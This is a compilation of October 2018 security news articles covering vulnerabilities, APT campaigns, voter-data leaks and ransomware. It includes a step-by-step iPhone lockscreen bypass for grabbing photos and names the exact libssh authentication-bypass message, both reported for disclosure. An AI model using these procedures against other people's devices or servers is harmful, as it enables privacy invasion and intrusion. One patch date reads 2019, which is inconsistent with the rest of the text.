Other important vulnerabilities resolved with the October 2018 CPU include CVE-2018-3259, which impacts Database Server; CVE-2018-1275, affecting Fusion Middleware; CVE-2018-7489, impacting JD Edwards Products; and CVE-2018-11776, affecting MySQL. All of these flaws have a CVSS score of 9.8.

At 301, this month’s CPU is the second largest for 2018, after July’s CPU. At 1,119, the total number of vulnerabilities addressed this year, however, is the same as that registered last year, as ERPScan, a company that specializes in securing Oracle and SAP applications, points out.

Over the past five years, the number of patches released by Oracle each year nearly tripled (it was 430 in 2013).

“The fact that Oracle has 430,000 applications customers from the wide range of industries in 175 countries makes it of the utmost importance to apply the released security patches,” ERPScan notes.


Critical Vulnerabilities Allow Takeover of D-Link Routers
18.10.2018 securityweek
Vulnerebility

Researchers have found several vulnerabilities that can be exploited to take full control of some D-Link routers, and patches do not appear to be available. Serious flaws have also been discovered in routers from Linksys.

The security holes affecting D-Link devices were discovered by a research team at the Silesian University of Technology in Poland. The bugs impact the httpd server of several D-Link routers, including DWR-116, DWR-111, DIR-140L, DIR-640L, DWR-512, DWR-712, DWR-912, and DWR-921.

One of the vulnerabilities, tracked as CVE-2018-10822, is a directory traversal issue that allows remote attackers to read arbitrary files using a simple HTTP request. The vulnerability was previously reported to D-Link and tracked as CVE-2017-6190, but the vendor failed to address it in many of its products.

This flaw can be exploited to gain access to a file that stores the device's admin password in clear text. The storage of passwords in clear text is the second vulnerability, identified as CVE-2018-10824.

Since this security hole poses a serious risk and is easy to exploit, the researchers have not disclosed the exact location of the file storing the admin passwords.

Once authenticated, an attacker can exploit a third vulnerability, tracked as CVE-2018-10823, to execute arbitrary commands and take full control of the device. A video shows how exploitation works:

D-Link was notified of the vulnerabilities back in May and it promised to release a patch for DWR-116 and DWR-111 devices, along with a security alert for products that have reached end of life. However, no patches appear to have been released to date and the researchers have decided to make their findings public.

SecurityWeek has reached out to D-Link for comment and will update this article if the company responds.

In the meantime, the security holes can be mitigated by ensuring that the router is not accessible from the Internet.

Vulnerabilities in Linksys E-Series routers

Researchers at Cisco Talos discovered several vulnerabilities in E-Series routers from Linksys. Multiple OS command injection flaws can be exploited to hack a device and install malware on it.

Unlike the vulnerabilities in D-Link products, the ones found by Talos can only be exploited by an authenticated attacker and the vendor has released patches.


After 2016 Hack, Illinois Says Election System Secure
18.10.2018 securityweek
BigBrothers  Hacking

Illinois officials assured voters Tuesday that their Nov. 6 tallies "will be securely counted" following a data breach that's part of the Justice Department's investigation of Russian meddling in U.S. elections.

Board of Elections Chairman William Cadigan and a group of state and local officials — including Illinois National Guard leaders — said in Chicago that beefed-up measures to monitor and spot cybersecurity risks will ensure a fair and free election.

"We're as prepared as we ought to be right now, given the information we have," Cadigan said. "People should get out and vote because your vote is going to count and at the end of the day, we believe it's going to be securely counted."

The board hired three cybersecurity experts to watch elections and voter-data systems for irregularities, Cadigan said, including one housed at the Illinois State Police Statewide Terrorism and Intelligence Center. Local elections administrators have undergone rigorous training and the National Guard is on call for emergencies.

Officials discovered in summer 2016 that a hacker had downloaded information on up 76,000 Illinois voters in what federal authorities allege was a concentrated attack by Russian intelligence agents, but whether they penetrated states other than Illinois has never been determined.

State officials notified those affected and there's no indication that voting that fall was affected. But the Illinois breach and its potential damage was evident when it formed part of Justice Department special counsel Robert Mueller's indictment last July of a dozen Russian intelligence agents for hacking. The indictment alleged that the perpetrators stole information from as many as 500,000 voters.

Illinois authorities believe Mueller's investigators are counting even fragments of personal data that were not complete enough to require them to alert a voter.

Officials also noted that despite electronic voting in Illinois, state law requires that each vote leave behind a paper receipt, so any vote that is disrupted electronically can still be audited.

Logan County Clerk and Recorder Sally Turner said county and municipal elections administrators have met several times in the past year for extensive training on spotting and interpreting cyber threats.

"We want our communities and our voters to know that we as election officials in Illinois are focused on protecting our systems with rigorous attention to cybersecurity," Turner said.

Major Gen. Richard Hayes, Illinois' adjutant general, said Defense Department-trained analysts with the National Guard are on call. In case of catastrophe, they're quickly mobilized.

"If someone tries to disrupt the election on Election Day, we can have a guardsman dispatched within an hour anywhere in Illinois," elections board member Chuck Scholl said. "We'll have boots on the ground in whatever county, whatever election authority that's affected, within an hour."


Thousands of servers easy to hack due to a LibSSH Flaw
17.10.2018 securityaffairs
Vulnerebility

The Libssh library is affected by a severe flaw that could be exploited by attackers to completely bypass authentication and take over a vulnerable server.
The Secure Shell (SSH) implementation library, the Libssh, is affected by a four-year-old severe vulnerability that could be exploited by attackers to completely bypass authentication and take over a vulnerable server without requiring a password.

The flaw is an authentication-bypass vulnerability that was introduced in Libssh version 0.6 released in 2014,

The issue tracked as CVE-2018-10933 was discovered by Peter Winter-Smith from NCC Group, it ties a coding error in Libssh.

The exploitation of the flaw is very trivial, an attacker only needs to send an “SSH2_MSG_USERAUTH_SUCCESS” message to a server with an SSH connection enabled when it expects an “SSH2_MSG_USERAUTH_REQUEST” message.

“libssh versions 0.6 and above have an authentication bypass vulnerability in the server code. By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST message which the server would expect to initiate authentication, the attacker could successfully authentciate without any credentials.” reads the security advisory.

The library fails to validate if the incoming “successful login” packet was sent by the server or the client, and also fails to check if the authentication process has been successfully completed.

This means that if a remote attacker sends the “SSH2_MSG_USERAUTH_SUCCESS” response to libssh, the library considers that the authentication has been successfully completed.

Thousands of vulnerable servers are exposed online, by querying the Shodan search engine we can see that more than 6,500 servers are affected by the issue.

But before you get frightened, you should know that neither the widely used OpenSSH nor Github’s implementation of libssh was affected by the vulnerability.

The Libssh maintainers addressed the flaw with the release of the libssh versions 0.8.4 and 0.7.6.

Experts pointed out that GitHub and OpenSSH implementations of the libssh library are not affected by the flaw.

Will Dormann
@wdormann
· 16h
Replying to @GitHubSecurity
Can you clarify as to what makes GitHub Enterprise unaffected? It uses libssh in SSH server mode.

GitHub Security
@GitHubSecurity
We use a custom version of libssh; SSH2_MSG_USERAUTH_SUCCESS with libssh server is not relied upon for pubkey-based auth, which is what we use the library for. Patches have been applied out of an abundance of caution, but GHE was never vulnerable to CVE-2018-10933.

2:39 AM - Oct 17, 2018
40
19 people are talking about this


Branch.io Flaws may have affected as many as 685 million individuals
17.10.2018 securityaffairs
Vulnerebility

More than 685 million users may have been exposed to XSS attacks due to a flaw in Branch.io service used by Tinder, Shopify, and many others.
Security Affairs was the first to publish the news of a DOM-XSS Bug Affecting Tinder, Shopify, Yelp, and other dating application.

The flaws were disclosed a few days ago by the researchers at vpnMentor who explained that an attacker could have been exploited them to access Tinder users’ profiles.

“After initial reconnaissance steps were done, a Tinder domain with multiple client-side security issues was found – meaning hackers could have access to users’ profiles and details.

Immediately after finding these vulnerabilities, we contacted Tinder via their responsible disclosure program and started working with them.” reads the analysis published by vpnMentor.

“We learned that the vulnerable endpoint isn’t owned by Tinder, but by branch.io, an attribution platform used by many big corporations around the globe. The Tinder security team helped us get in touch with them, and accordingly, they’ve put out a timely patch.”

Tinder’s security team immediately launched an investigation and discovered that the go.tinder.com domain was actually an alias for Branch.io-owned custom.bnc.lt.

The Branch.io company provides the leading mobile linking platform, with solutions that unify user experience and measurement across different devices, platforms, and channels.

A large number of major firms uses an alias to point the same custom.bnc.lt, including Yelp, Western Union, Shopify, RobinHood, Letgo, imgur, Lookout, fair.com and Cuvva, vpnMentor said.

According to vpnMentor, the flaws may have affected as many as 685 million individuals using the vulnerable services.

The DOM-based XSS discovered by the experts would have been easy to exploit in many web browsers, researchers pointed out that Branch.io’s failed to use a Content Security Policy (CSP).

Branch.io flaw

The experts urge users to change their passwords as a precaution.

“Digging deeper, we found out many big websites were sharing the vulnerable endpoint in their code and domains, including Shopify, Yelp, Western Union, and Imgur. This means that as many as 685 million users could be at risk.” continues the experts.

“While the flaw has already been fixed, if you have recently used Tinder or any of the other affected sites, we recommend checking to make sure your account hasn’t been compromised. It’s a good idea to change your password ASAP.”

Additional technical details are included in the analysis published by the experts.


Russia-linked BlackEnergy backed new cyber attacks on Ukraine’s state bodies

17.10.2018 securityaffairs APT  BigBrothers

The Security Service of Ukraine (SBU) uncovered a new targeted attack launched by BlackEnergy APT on the IT systems of Ukrainian government entities.
The Security Service of Ukraine (SBU) uncovered a new targeted attack on the information and telecommunication systems of Ukrainian government entities.
The SBU attributed the attack to the BlackEnergy Russia-linked APT group.
“The Security Service of Ukraine has received more evidence of the aggressive actions of Russian intelligence services against Ukraine in cyberspace using a controlled hacker group responsible for carrying out cyberattacks on Ukraine’s critical infrastructure facilities during 2015-2017, known as BlackEnergy and NotPetya,” reads the SBU’s press release.

BlackEnergy made the headlines as the responsible for the massive power outage that occurred in Ukraine in December 2015.

The BlackEnergy malware is a threat improved to target SCADA systems, some variants include the KillDisk component developed to wipe the disks and make systems inoperable.

According to the SBU, BlackEnergy hackers used new samples of malware in a recent series of attack. The new malicious code act as surveillance software, they implement surveillance capabilities and remote administration features.

SBU along with experts from a well-known antivirus company determined that the malware involved in the attack are updated versions of the Industroyer backdoor.

The specialists involved in the investigation helped the Ukraine SBU to attribute the attack and implement mitigations to protect the IT infrastructure of government agencies.

The malware used in the recent attacks borrows the code from the Industroyer as reported by the ukrinform.net. website

“They have a number of similar characteristics, in particular using similar code snippets, computing capabilities of infected systems, etc.” states the ukrinform.net.

Experts from the SBU also observed attackers using hacking tools that were used by the BlackEnergy hackers in previous attacks.


Online market for counterfeit goods in Russia has reached $1,5 billion
17.10.2018 securityaffairs
CyberCrime

Group-IB: The online market for counterfeit goods in Russia has reached $1,5 billion, while the number of phishing attacks has surpassed 1,200 daily
Group-IB, an international company that specialises in the prevention of cyber attacks, has estimated that online sales of counterfeit goods are now worth $1.5 billion. This information was first made public by experts from Group-IB’s Brand Protection team at the CyberCrimeCon 2018 international cybersecurity conference.

According to Group-IB, the online market for counterfeit goods in Russia has increased by 23% in a year and totaled more than $1.5 billion in 2017, compared to $1.2 billion in 2016. Fraudsters use their websites to sell household appliances and computer equipment, clothing and footwear, jewelry, accessories, cosmetics, medicinal products, and much more, often at hugely discounted prices – up to 80% off. According to Group-IB’s statistics, every fifth counterfeit product was bought online. On average, Russians spend $78 per year on counterfeit goods.

“For large organisations, the actions of online fraudsters mean not only a direct loss in revenue, but also damaged customer loyalty, brand abuse, and fewer shoppers,” says Andrey Busargin, Director of Brand Protection at Group-IB. “It also leads to a decrease in what we call the psychological price, i.e. the cost that customers are willing to pay for a product from the official retailer. Around 64% of users stop buying a company’s goods after a negative experience.”

Counterfeit goods are not the only threat to popular brands on the Internet. Scammers create fake websites of known brands, fraudulent promotional campaigns, and fake accounts on social media. In recent years, an often-used fraud method has been fake mobile applications: 36% of users are unable to distinguish between genuine and fake apps, and 60% of the latter request access to the user’s personal data.

Fraudsters use various ways to deceive users: phishing websites, fake mobile apps, accounts and groups on social media. Phishing remains one of the most common online fraud. According to the experts from Group-IB Brand Protection, around 1,270 phishing attacks are carried out daily. The main goals of phishing resources are stealing money from bank cards and obtaining login credentials to personal accounts.

Scammers do not simply copy a company’s website, brand, logos, and colors in addition to registering a similar domain name; they also use the same promotional methods as the legal resources. To secure the traffic they need, scammers ensure that their websites appear at the top of search engine results: 96% of users click on links found on the first page displayed by search engines. Only 35% of them are official resources, however.

Contextual advertising also plays a role: for only $15, it is possible to buy 100 guaranteed visits to a phishing website. Scammers also buy banner ads, use search engine optimisation (SEO), and social media promotion (every day, around 150 social media users are deceived by fraudsters on average). In addition to technological ways of attracting traffic by using bots that target opinion leaders, scammers do not shy away from the classic tactic of mass email blasts purporting to be from popular brands, with 20% of users opening emails that contain content that is characteristic of malware or phishing.

Given that users blindly trust influencers (68% of people choose goods or services based on feedback on social media), scammers create fake accounts. For example, a fake account in Pavel Durov’s name brought in more than $50000 in only a couple of hours after being created. According to Group-IB, 43% of celebrities and 31% of politicians have fake accounts that use their names.

“Fighting online fraudsters and counterfeiting requires adopting serious countermeasures,” warns AndreyBusargin.

“We advise companies to continuously track phishing resources and monitor references to their brand in domain name databases, search engine results, social media, messengers, and context ads so as to identify scammers hiding behind the company’s brand. It is also important to monitor mobile applications, in both official and unofficial stores, in addition to forums, search engine results, social media, and websites where they might be found. To effectively fight against scammers and fraudsters, it is important to detect and block all the resources connected with a fraudulent website. Fraudsters usually create several phishing websites at once, which can be detected using correlation and website affiliation analysis.”


A simple message containing certain symbols could crash the Sony PlayStation 4
17.10.2018 securityaffairs
Hacking

PlayStation 4 gaming consoles could crash when they receive messages containing certain symbols from fellow gamers.
The consoles could freeze on while the owners are playing their preferred games, the DoS condition is triggered while the devices are parsing symbols in messages received.

“There is a new glitch that basically bricks your console and forces you to factory reset it. Even deleting the message from the mobile app doesn’t work. It happened to me during Rainbow Six: Siege. A player from the other team used a dummy account to send the message and crashed my entire team. We all have had to factory reset. Only one of our guys wasn’t affected and he has his messages private.” reads a thread on Reddit.

Many users reported the glitch in the PlayStation 4, even deleting the message from the mobile app the problem persists. Some users fixed the issue by restoring the gaming console to factory settings, but in this way, they have lost data related to their game if they did not subscribe to PS Plus service that backs them up automatically to Sony cloud.

PlayStation 4 parser error

According to the Reddit thread, some gamers playing online multiplayer games sent the malicious message to the members of the opposing team, causing them crashing.

The error triggered by the message was tracked as with the PS4 code CE-36329-3.

Fortunately, the issue could be easily fixed by deleting the crashing message from the mobile app.

Experts recommend to rebuild the database of the console to completely fix the problem, below the step-by-step procedure:

Turn off the PS4 system by pressing the power button on the front panel. The power indicator will blink for a few moments before turning off.
Once the PS4 system is off, press and hold the power button again. Release it after you hear the second beep: one beep will sound when you first press, and another seven seconds later.
Connect the DUALSHOCK 4 with the USB cable and press the PS button on the controller.
Select the Rebuild Database option

PlayStation 4 users can protect their console by enabling communication only from friends, below the procedure to do it:
Go to Settings > Account Management > Privacy Settings
Enter your password
Select Personal Info | Messaging
Set Messages to either Friends or No


How Cybercriminals are Targeting free Wi-Fi Users?
17.10.2018 securityaffairs
CyberCrime

Free Wi-Fi is convenient, but it is also unsafe and puts users at great risk. Here’s how the cybercriminals attack user on these open networks.
The free Wi-Fi is one of the catchiest things for the users in today’s world. This is the main reason why so many free public Wi-Fi can be found without much of a problem. It is not only free but convenient to use these open networks. However, many might not be aware of the fact that these free open Wi-Fi hotspots are actually unsafe and they put the users at great risk.

There are multiple ways in which many cybercriminals are targeting the users of these free Wi-Fi hotspots. Many of these users are at least aware that the open networks they connect are actually unsafe. But what they do not know are various ways in which they are being targeted by the cybercriminals and hackers on these open networks.

Ways in which Hackers Target free Wi-Fi Users

The open for all nature of the free public Wi-Fi networks makes them unsafe for all the users. All the cybercriminals are always on the lookout to get their hands on users’ personal or financial data or they look for vulnerabilities to get access to their devices. These free networks give the cybercriminals the perfect opportunity to fulfill their purpose. The following are some of the common ways how cybercriminals target the free Wi-Fi users.

free Wi-Fi

Man in the middle attack
The man in the middle attack is one of the most commonly used attacks where the cybercriminal places himself between the user and the router. This way, all the requests by the user actually routes through the hacker. This way, the hacker can actually have full control over the network, and he or she can easily get what they want from the user.

Carrying this attack successfully is so easy that it took 10 minutes to a 7 years old girl to hack into public Wi-Fi network and access stranger’s laptop. It was a real experiment and the girl who attempted and successfully hacked the network in 10 minutes was Betsy Davies. So, if a 7 years old can do it in 10 minutes, imagine what a pro can do in a matter of minutes.

Fake Wi-Fi Access Points
It is also easily possible for the cybercriminals to make fake Wi-Fi access points in public spaces. They can setup rouge Wi-Fi networks, which gives them all the data and the access to users’ device or system. It is fairly easy to create as the cybercriminals set up this rouge network as a bait and name it something very general. They wait for the user to connect to this rouge network and they can have them connected.

As soon as the web connection of the user is made on this rouge network, there are plenty of ways in which the attacker can carry out the attack. One way is that the cybercriminal may direct the user to a malicious website where he or she will be forced to download a malware on their system. The second is the spoofed banking page where the attacker would want the user to enter their banking detail and financial data so they can easily capture this sensitive information.

Fake Honeypots
The fake honeypots are quite similar to the fake Wi-Fi access points, but the only difference is that the honeypot is set in a more sophisticated manner. This increases the chances of more users’ falling for the trap that has been set by the cybercriminals.

Imagine connecting to an airport’s Wi-Fi network where you saw two options with similar names and even passwords. It is certain that one of these is a honeypot which is there to capture users’ data and use their sensitive information in the wrong way.

Intercepting your data and credentials

Another very brutal attack is the interception of users’ internet data when they are on these unsecured public Wi-Fi hotspots. The internet data transmitted on these networks is not encrypted. Since these networks are unsafe, it makes it easy for hackers to sniff and intercept that data which can have the login credentials of the user.

Due to this method, the cybercriminals easily get their hands on users’ data which includes their private information as well. Since this data is not encrypted, the hackers do not have to do much to use that data for their evil purposes.

So, these are some of the common attacks which are being used by the cybercriminals to target the users on the free Wi-Fi networks. There definitely is a way to stay protected on these public Wi-Fi hotspots and we are discussing it below.

How to stay protected with VPN on Public Wi-Fi Networks?

The best and the most advanced way to stay protected on these unsafe public Wi-Fi hotspots is to use a decent VPN service. There are some ace VPN providers who offer strong security and encryption which makes it extremely hard for the cybercriminals to get access to users’ accounts and data.

The VPN does not only encrypt all of users’ data to protect their privacy on the web, but it also creates a secure tunnel between the user’s device and the VPN server which is hard to break in. It is because the tunnel is also encrypted and the encrypted data goes through this tunnel. The cybercriminals cannot easily get their hands on users’ data if they are using one of the best VPN services.

Even if they get their hands on users’ data, then all they will get it gibberish, because all the top VPN providers offer strong encryption which is not only hard to break but also takes years to decrypt even if the hacker chooses to use some automatic tools.

Final Words

If you use the free public Wi-Fi hotspots a lot at different places like malls, cafes, restaurants, or any other public space, then you should be aware that these open networks are actually unsafe and it can put you in great danger. If you wish to use these free open Wi-Fi networks then you need to get a decent VPN service and connect it before surfing the web on these networks.


35 million US voter records available for sale in a hacking forum
17.10.2018 securityaffairs 
BigBrothers

Millions of voter records are available for sale on the Dark Web, experts discovered over 35 million US voter records for sale in a hacking forum.
Millions of voter records are available for sale on the Dark Web, experts from Anomali and Intel 471 discovered 35 million US voter records for sale in a hacking forum.

Researchers have analyzed a sample of voter records and determined the data to be valid with a high degree of confidence.

Records in the voter registration database include personal and voting history information of US residents.

“Certain states require the seller to personally travel to locations in-state to receive the updated voter information.” reads the post published by Anomali.

“This suggests the information disclosure is not necessarily a technical compromise but rather a likely targeted campaign by a threat actor redistributing possibly legitimately obtained voter data for malicious purposes on a cybercrime forum,”

The seller only provided the number of records for the lists of voters belonging to three states asking for prices between $1,300 and $12,500.

Louisiana (3 million);
Wisconsin (6 million);
Texas (14 million);
us voter records

The seller also claims to have lists of voters for other states, including Montana, Iowa, Utah, Oregon, South Carolina, Wisconsin, Kansas, Georgia, New Mexico, Minnesota, Wyoming, Kentucky, Idaho, South Carolina, Tennessee, South Dakota, Mississippi, and West Virginia.

According to the seller, voting lists are weekly updated with the help of people in the state governments.

“Certain states require the seller to personally travel to locations in-state to receive the updated voter information.” reads a report published by Anomali Labs.

“This suggests the information disclosure is not necessarily a technical compromise but rather a likely targeted campaign by a threat actor redistributing possibly legitimately obtained voter data for malicious purposes on a cybercrime forum,”

This kind of information it a precious commodity for threat actors, members of the forum already expressed their interest in the huge trove of data.

“With the November 2018 midterm elections only four weeks away, the availability and currency of the voter records, if combined with other breached data, could be used by malicious actors to disrupt the electoral process or pursue large scale identity theft,” explained Hugh Njemanze, chief executive officer of Anomali.

The persistent access to voters records claimed by the seller represents a serious threat to US voters and for the US politics.

“Given the illicit vendor claims of weekly updates of voter records and their high reputation on the hacker forum, we assess with moderate confidence that he or she may have persistent database access and/or contact with government officials from each state.” concludes.

“These types of unauthorized information disclosures increasing the threat of possible disruptive attacks against the U.S. electoral process such as voter identity fraud and voter suppression.”


Expert disclosed a new passcode bypass to access photos and contacts on a locked iPhone
17.10.2018 securityaffairs
Apple

iOS passionate Jose Rodriguez disclosed a new passcode bypass bug that could be to access photos and contacts on a locked iPhone XS.
The security passionate Jose Rodriguez has discovered a new passcode bypass bug that could be exploited on the recently released iOS 12.0.1.

A few weeks ago, Rodriguez discovered a passcode bypass vulnerability in Apple’s new iOS version 12 that could have been exploited to access photos, contacts on a locked iPhone XS.

Now the expert discovered a similar flaw that is very easy to execute by a physical attacker to access photo album of a locked device. The bug allows the attacker to select photos and send them to anyone using Apple Messages.

The new passcode bypass attack works on all current iPhone models, including iPhone X and XS devices, running the latest version of iOS 12 to 12.0.1 version.

The new hack devised by Rodriguez leverage Siri assistant and VoiceOver screen reader to bypass the passcode.

 

Below the step-by-step procedure for the passcode bypass discovered by Rodriguez:

Call the target phone from any other phone.
Instead of answering the call, click on “Message” in the call window.
Select “Custom” to reply via text message. That will open the Messages input screen.
Invoke Siri to activate VoiceOver, the iOS feature that helps sight-impaired users use an iPhone.
Click on the camera icon.
Invoke Siri with the iPhone’s home button while you double-tap the display. The screen will turn black. This is where the bug kicks in and iOS gets confused.
From here, click on the home button again while the screen remains black.
Swipe up to the upper left corner while the screen remains black. VoiceOver will tell you what you have selected.
Keep swiping to the top left corner until VoiceOver tells you that you can select the Photo Library (“Fototeca” in Rodriguez’ video).
Tap to select Photo Library.
After selecting the Photo Library, iOS will take you back to the message screen, but you’ll see a blank space where the keyboard should be. The blank space is actually an invisible Photo Library.
Click on the shelf handle on top of the blank space to activate the Photo Library.
Now you only have to swipe and double tap to start grabbing photos. Each photo will be pasted in your input field, ready to be sent to any number.
Waiting for a patch it is possible to mitigate the issue by disabling Siri from the lockscreen (Go to the Settings → Face ID & Passcode (Touch ID & Passcode on iPhones with Touch ID) and Disable Siri toggle under “Allow access when locked).


Russia-linked APT group DustSquad targets diplomatic entities in Central Asia
17.10.2018 securityaffairs
APT

Kaspersky experts published a detailed analysis of the attacks conducted by the Russian-linked cyber espionage group DustSquad.
Earlier October, security experts from ESET shared details about the operations of a cyber espionage group tracked as Nomadic Octopus, a threat actor focused on diplomatic entities in Central Asia.

The group has been active since at least 2015, ESET researchers presented their findings at the Virus Bulletin conference.

“ESET researchers recently discovered an interesting cyber espionage campaign active in several countries of Central Asia. We attribute these attacks to a previously undocumented APT group that we have named Nomadic Octopus.” states the blog post published by Virus Bulletin.

“Our findings suggest that this APT group has been active since at least 2015. The main goal of Nomadic Octopus appears to be cyber espionage against high-value targets, including diplomatic missions in the region”

The experts presented their findings at the Virus Bulletin conference.

Now Kaspersky experts published a detailed analysis of the attacks conducted by the group, tracked by the Russian firm as DustSquad, and the tools they used.

Kaspersky is monitoring the activity of the group for the last two years, DustSquad is a Russian-language cyberespionage group particularly active in Central Asian.

“For the last two years we have been monitoring a Russian-language cyberespionage actor that focuses on Central Asian users and diplomatic entities. We named the actor DustSquad and have provided private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware.” states the analysis published by Kaspersky Lab.

“The name was originally coined by ESET in 2017 after the 0ct0pus3.php script used by the actor on their old C2 servers. We also started monitoring the malware and, using Kaspersky Attribution Engine based on similarity algorithms, discovered that Octopus is related to DustSquad, something we reported in April 2018. “

The group targeted the victims with spear-phishing emails, the threat actors use Russian malware filenames.

Kaspersky tracked a campaign conducted by the group back to 2014 when hackers targeted entities in the former Soviet republics of Central Asia, plus Afghanistan.

In April 2018, the researchers discovered a new Octopus sample developed to target Windows systems, the malicious code had been disguised as a Russian version of the Telegram app used by the Democratic Choice (DVK) opposition party in Kazakhstan.

Attackers attempted to exploit the threaten of the Kazakhstan government to block Telegram over its use by the DVK.

DustSquad fake Telegram

The Octopus Trojan is written in Delphi, the same programming language used by Russian-linked APT group Sofacy for the development of the Zebrocy backdoor.

The malicious code backdoor features, including the ability to execute commands, upload and download files, take screenshots, and finding *.rar archives on the host.

Experts noticed that even if they found malware used by both DustSquad and Sofacy APT on the compromised machines, the two cyber espionage groups are not linked.

Kaspersky pointed out that many components of the Octopus malware are still unfinished, likely attackers created the malicious code in a hurry and not implemented certain features such as communication functionalities.

“Political entities in Central Asia have been targeted throughout 2018 by different actors, including IndigoZebra, Sofacy (with Zebrocy malware) and most recently by DustSquad (with Octopus malware),” continues the Kaspersky report.

“Interestingly, we observed some victims who are ‘threat magnets’ targeted by all of them. From our experience we can say that the interest shown by threat actors in this region is now high, and the traditional ‘players’ have been joined by relative newcomers like DustSquad that have sprung up locally.”

Additional technical details are reported in the analysis, including IoCs.


A crippling ransomware attack hit a water utility in the aftermath of Hurricane Florence
17.10.2018 securityaffairs
Ransomware

A water utility in the US state of North Carolina suffered a severe ransomware attack in the week after Hurricane Florence hit the East Coast of the U.S.
According to the Onslow Water and Sewer Authority (aka ONWASA) some internal systems were infected with the Emotet malware, but the regular water service was not impacted.

According to ONWASA, the infections would require several of the main databases to be completely recreated, fortunately, no customer information was compromised.

“We are in the middle of another disaster following Hurricane Florence and tropical storm Michael,” CEO Jeff Hudson said employees in a video posted on Facebook,

“With a very sophisticated attack they penetrated our defenses, just as they penetrated the city of Atlanta and Mecklenburg county.”

hurricane florence

ONWASA CEO Jeffrey Hudson confirmed the ransomware attack began on October 4, the IT staff initially thought to have locked out the threat, however, on October 13 the malware started dropping the Ryuk ransomware into the infected systems.

“An ONWASA IT staff member was working was working at 3am and saw the attack,” ONWASA said.

“IT staff took immediate action to protect system resources by disconecting ONWASA from the internet, but the crypto-virus spread quickly along the network encrypting databases and files.”

Operators at the utility did not pay the ransom and opted out to recreate the infected systems.

“Ransom monies would be used to fund criminal, and perhaps terrorist activities in other countries,” ONWASA reasoned. “Furthermore, there is no expectation that payment of a ransom would forestall repeat attacks.”

The incident response had a significant impact on the operations of the utility in a critical moment, the aftermath of the Hurricane Florence.

ONWASA estimates it will take several weeks to rebuild all of the damaged systems, it will not possible for customers to pay the bill online and major delays will affect the service provided by the utility.

The effects of the Hurricane Florence on the Onslow county were important, schools are still closed and local authorities are still working to clean up debris from the massive storm. It has been estimated that costs to restore the ordinary situation will hit $125m.


VMware addressed Code Execution Flaw in its ESXi, Workstation, and Fusion products
17.10.2018 securityaffairs
Vulnerebility

VMware has addressed a critical arbitrary code execution flaw affecting the SVGA virtual graphics card used by its ESXi, Workstation, and Fusion products.
VMware has released security updated to fix a critical arbitrary code execution vulnerability (CVE-2018-6974) in the SVGA virtual graphics card used by its ESXi, Workstation, and Fusion solutions.

The issue in the VMware products is an out-of-bounds read vulnerability in the SVGA virtual graphics card that could be exploited by a local attacker with low privileges on the system to execute arbitrary code on the host.

“VMware ESXi, Fusion and Workstation contain an out-of-bounds read vulnerability in SVGA device. This issue may allow a guest to execute code on the host.” reads the security advisory published by the company.

VMware credited an anonymous researcher for reporting the flaw through Trend Micro’s Zero Day Initiative (ZDI).

According to the ZDI’s own advisory, the vulnerability was reported to VMware in mid-June.

“This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of VMware Workstation. An attacker must first obtain the ability to execute low-privileged code on the guest system in order to exploit this vulnerability.” read the ZDI’s advisory.

“The specific flaw exists within the handling of virtualized SVGA. The issue results from the lack of proper validation of user-supplied data, which can result in an overflow of a heap-based buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the host OS.”

VMware classified the issue as “medium” severity and assigned it a CVSS score of 6.9.

The same anonymous expert also reported an out-of-bounds write vulnerability in the e1000 virtual network adapter, tracked as CVE-2018-6973, used by Workstation and Fusion.

The CVE-2018-6973 flaw could be exploited by a local attacker to execute arbitrary code, VMware addressed this flaw in September.

This flaw is similar to the previous one, an attacker requires at low-privileged access to the exploit the issue on the target system.

“This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of VMware Workstation. An attacker must first obtain the ability to execute low-privileged code on the guest system in order to exploit this vulnerability.” states ZDI’s advisory,

“The specific flaw exists within the handling of the virtualized e1000 device. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the host OS.”

The cloud computing and platform virtualization company classified also assigned this flaw a CVSS score of 6.9.

In June, the company fixed a critical remote code execution vulnerability in the AirWatch Agent applications for Android and Windows Mobile.


Brazil expert discovers Oracle flaw that allows massive DDoS attacks
17.10.2018 securityaffairs
Vulnerebility

Oracle has just released a security update to prevent 2.3 million servers running the RPCBIND service from being used in amplified DDoS attacks.
The flaw was discovered by the Brazilian researcher Mauricio Corrêa, founder of Brazilian security company XLabs. The exploitation of this vulnerability could cause major problems on the Internet.

“A proof of concept (POC) made in only one XLabs server generated a traffic of 69 gigabits per second,” Mauricio told Cibersecurity.net.br.

At the time of the discovery, the expert queried Shodan and found that there were nearly 2.6 million servers running RPCBIND on the Internet. The multiplication of this exploit in a 2.6 million server farm leads to a frightening conclusion.

RPCBIND ddos

RPCBIND is software that provides client programs with the information they need about server programs available on a network. It runs on port 111 and responds with universal addresses of the server programs so that client programs can request data through RPCs (remote procedure calls).

These addresses are formed by the server IP pool plus port. Since its launch, RPCBIND has been receiving updates that cover several failures, including security. This, however, is the most serious finding so far.

The discovery of the crash began on June 11 this year. On that day, one of the web application firewalls (WAFs) installed in the XLabs SOC (security operations center) detected an abnormal pattern of network traffic that caught the eye of Mauricio.

The data showed that a DDoS attack was in progress, coming from port 111 of several servers, all from other countries.

“We then decided to open a server with port 111 exposed on the Internet, with the same characteristics as those who were attacking us and we were monitoring that server for weeks. We found that he was receiving requests to generate attacks, ” he explained.

After further analysis of the subject, it was possible to reproduce the attack in the laboratory.

“By analyzing the servers exposed at Shodan, the extent of the problem was confirmed,” continues Mauricio.

The problem discovered by Mauricio is worse than Memcrashed, detected in February of this year. In this type of distributed denial of service (DDoS) attack, the malicious traffic generated with the technique is greater than the once associated with the use of memcached, a service that does not require authentication but has been exposed on the internet by inexperienced system administrators. The service runs on UDP port 11211 and its exploitation by cybercriminals has already generated 260GB traffic according to Cloudflare company measurements.

After developing the POC, Maurício reported the problem to Oracle’s security team, since RPCBIND is a solution originating from Sun, which was acquired by the company in 2010.

He sent the information to Oracle so that the experts of the company could confirm and evaluate the problem. The confirmation arrived by email (see image), with the announcement of the publication date of the patch. It was on Tuesday, October 16, 2019 at 5:00 p.m., Brasília time, 1:00 p.m. in San Francisco, California.

The Brazilian version of the post is available on the author’s blog.


